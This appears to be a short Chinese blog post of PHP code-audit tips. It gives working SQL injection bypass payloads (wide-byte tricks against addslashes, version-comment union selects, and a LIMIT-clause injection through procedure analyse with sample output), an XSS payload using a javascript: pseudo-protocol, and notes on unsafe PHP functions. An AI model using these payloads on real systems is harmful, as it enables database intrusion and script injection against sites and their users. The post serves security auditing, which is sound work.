审计小tips

注入：

urldecode无视全局转义
不加单引号 无视gpc
如果数据库做了character_set_client=binary并且做了addslashes '转义'\->%5C %e5%5c%5c' 两个\ 则单引号出来  正则表达式/i表示同时匹配大小写字母，%E9%8C%A6%27 /*!50000uniounion*/ /*!50000select*/ 1,2,3,user(),5,6,7,version(),9 %23绕过utf-8+addslshes
aa%df' union selct user()%23
unserialize反序列化函数 如果全局转义可以利用此函数找能控的变量
extract()函数会造成变量覆盖
遇到limit注入使用procedure analyse即可实现注入

MariaDB [car]> select * from simcms_cars limit 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,user())),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'


函数缺陷：

in_arrary()第三个参数不为true时 可导致匹配不严格 

escape 过滤器-》htmlspecialchars ()
filter_var函数 这两个函数过滤时 考虑XSS可以用javascript伪协议绕过
?url=javascript://comment％250aalert(1);

posted @ 2019-03-11 20:06 易语言大师阅读(155) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

冫

审计小tips

公告